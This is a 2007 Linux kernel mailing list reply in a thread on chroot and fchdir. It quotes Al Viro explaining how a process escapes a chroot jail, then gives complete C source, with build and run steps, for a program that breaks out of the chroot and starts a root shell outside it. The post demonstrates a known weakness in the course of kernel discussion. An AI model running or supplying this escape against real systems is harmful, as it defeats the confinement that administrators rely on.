Return-Path: Received: (majordomo@vger.kernel.org) by vger.kernel.org via listexpand id S1757236AbXIZKDd (ORCPT ); Wed, 26 Sep 2007 06:03:33 -0400 Received: (majordomo@vger.kernel.org) by vger.kernel.org id S1754687AbXIZKD0 (ORCPT ); Wed, 26 Sep 2007 06:03:26 -0400 Received: from box.memset.com ([89.200.136.113]:54741 "EHLO box.memset.com" rhost-flags-OK-OK-OK-OK) by vger.kernel.org with ESMTP id S1754332AbXIZKDZ (ORCPT ); Wed, 26 Sep 2007 06:03:25 -0400 X-Greylist: delayed 1505 seconds by postgrey-1.27 at vger.kernel.org; Wed, 26 Sep 2007 06:03:25 EDT To: linux-kernel@vger.kernel.org Cc: Al Viro Subject: Re: sys_chroot+sys_fchdir Fix In-Reply-To: <97sX2-p1-3@gated-at.bofh.it> References: <952DN-83o-31@gated-at.bofh.it> <954cl-29C-3@gated-at.bofh.it> <95ctn-74b-15@gated-at.bofh.it> <95cMH-7um-19@gated-at.bofh.it> <95gdA-4OZ-7@gated-at.bofh.it> <95UE2-1oR-19@gated-at.bofh.it> <95V72-2ly-17@gated-at.bofh.it> <97pG8-3B5-47@gated-at.bofh.it> <97sX2-p1-3@gated-at.bofh.it> Date: Wed, 26 Sep 2007 10:38:17 +0100 Message-Id: <20070926093818.33A8014C2BF@irishsea.home.craig-wood.com> From: nick@craig-wood.com (Nick Craig-Wood) Sender: linux-kernel-owner@vger.kernel.org X-Mailing-List: linux-kernel@vger.kernel.org Content-Length: 1927 Lines: 74 Al Viro wrote: > If you are within chroot jail and capable of chroot(), you can chdir to > its root, then chroot() to subdirectory and you've got cwd outside of > your new root. After that you can chdir all way out to original > root. Here is some code I wrote a while back to demonstrate that escape method. /* * Break a chroot * * Compile this with * * gcc -static -Wall break-chroot.c -o break-chroot * * Get a root shell in the chrooted environment and run * * ./break-chroot * * Nick Craig-Wood * */ #include #include #include #include #include #include #include #define SHELL "bin/sh" /* no leading / */ int main(void) { struct stat buf; if (chdir("/")) perror("chdir /"), exit(1); printf("Making escape tunnel\n"); mkdir("/tmp", 01777); mkdir("/tmp/escape-tunnel", 0755); printf("Doing escape chroot leaving cwd behind\n"); if (chroot("/tmp/escape-tunnel")) perror("chroot /tmp/escape-tunnel"), exit(1); printf("Exploit cwd being above the root and find a " SHELL " to run\n"); do { printf("Going up...\n"); if (chdir("../")) perror("chdir ../"), exit(1); } while (stat(SHELL, &buf) != 0); printf("Chrooting back into the root directory\n"); if (chroot(".")) perror("chroot ."), exit(1); printf("If this doesn't error you are out of chroot!\n"); if (execl(SHELL, SHELL, 0)) perror("exec " SHELL), exit(1); printf("Something wicked happened!\n"); return 1; } -- Nick Craig-Wood -- http://www.craig-wood.com/nick - To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html Please read the FAQ at http://www.tux.org/lkml/